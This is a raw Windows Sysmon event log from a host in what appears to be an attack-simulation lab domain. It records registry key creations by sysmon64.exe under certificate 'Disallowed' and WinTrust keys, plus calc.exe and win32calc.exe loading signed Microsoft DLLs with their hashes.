12241200x800000000000000057349539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.442{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.286{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\winmmbase.dll10.0.14393.0 (rs1_release.160715-1616)Base Multimedia Extension API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWINMMbase.DLLMD5=24C1E8F8C10471C5A6F0E8AF141211EB,SHA256=75ECAE23C920D81614BA5C0648377C2FC04C7379FD6A388C244A81F50AAB7B1CtrueMicrosoft WindowsValid 12241200x800000000000000057349537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.286{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\winmmbase.dll10.0.14393.0 (rs1_release.160715-1616)Base Multimedia Extension API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWINMMbase.DLLMD5=24C1E8F8C10471C5A6F0E8AF141211EB,SHA256=75ECAE23C920D81614BA5C0648377C2FC04C7379FD6A388C244A81F50AAB7B1CtrueMicrosoft WindowsValid 12241200x800000000000000057349534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.441{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.438{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.270{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXEMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7trueMicrosoft WindowsValid 12241200x800000000000000057349512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.272{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXEMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7trueMicrosoft WindowsValid 12241200x800000000000000057349508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.437{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.436{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.435{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.425{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.425{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.424{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.424{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.249{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\mlang.dll10.0.14393.4169 (rs1_release.210107-1130)Multi Language Support DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMLANG.DLLMD5=1DB944C25F1B1D7105543E61F1CC5E2F,SHA256=EBA81052B0330151F8FE0FC95AFD2203D3869D67A05AD4E5D3FA8A69B48B4046trueMicrosoft WindowsValid 12241200x800000000000000057349484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.253{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\mlang.dll10.0.14393.4169 (rs1_release.210107-1130)Multi Language Support DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMLANG.DLLMD5=1DB944C25F1B1D7105543E61F1CC5E2F,SHA256=EBA81052B0330151F8FE0FC95AFD2203D3869D67A05AD4E5D3FA8A69B48B4046trueMicrosoft WindowsValid 12241200x800000000000000057349481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.423{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.421{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.417{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.417{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.245{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\ieframe.dll11.00.14393.4583 (rs1_release.210730-1850)Internet BrowserInternet ExplorerMicrosoft CorporationIEFRAME.DLLMD5=56C38F74FA41BC105130187415730AC8,SHA256=2815F9F6EB94A2878785B9B4694E08AF4084508D290EF90CF41E6F17A4C993E4trueMicrosoft WindowsValid 12241200x800000000000000057349456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.237{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=8893BE5829B2F909E7FC4AF4C43B54F9,SHA256=C1D791C72417FD001E2A5FE441717881D43428A931724E7FD2DCCE6C83699458trueMicrosoft WindowsValid 12241200x800000000000000057349452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=8893BE5829B2F909E7FC4AF4C43B54F9,SHA256=C1D791C72417FD001E2A5FE441717881D43428A931724E7FD2DCCE6C83699458trueMicrosoft WindowsValid 12241200x800000000000000057349449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 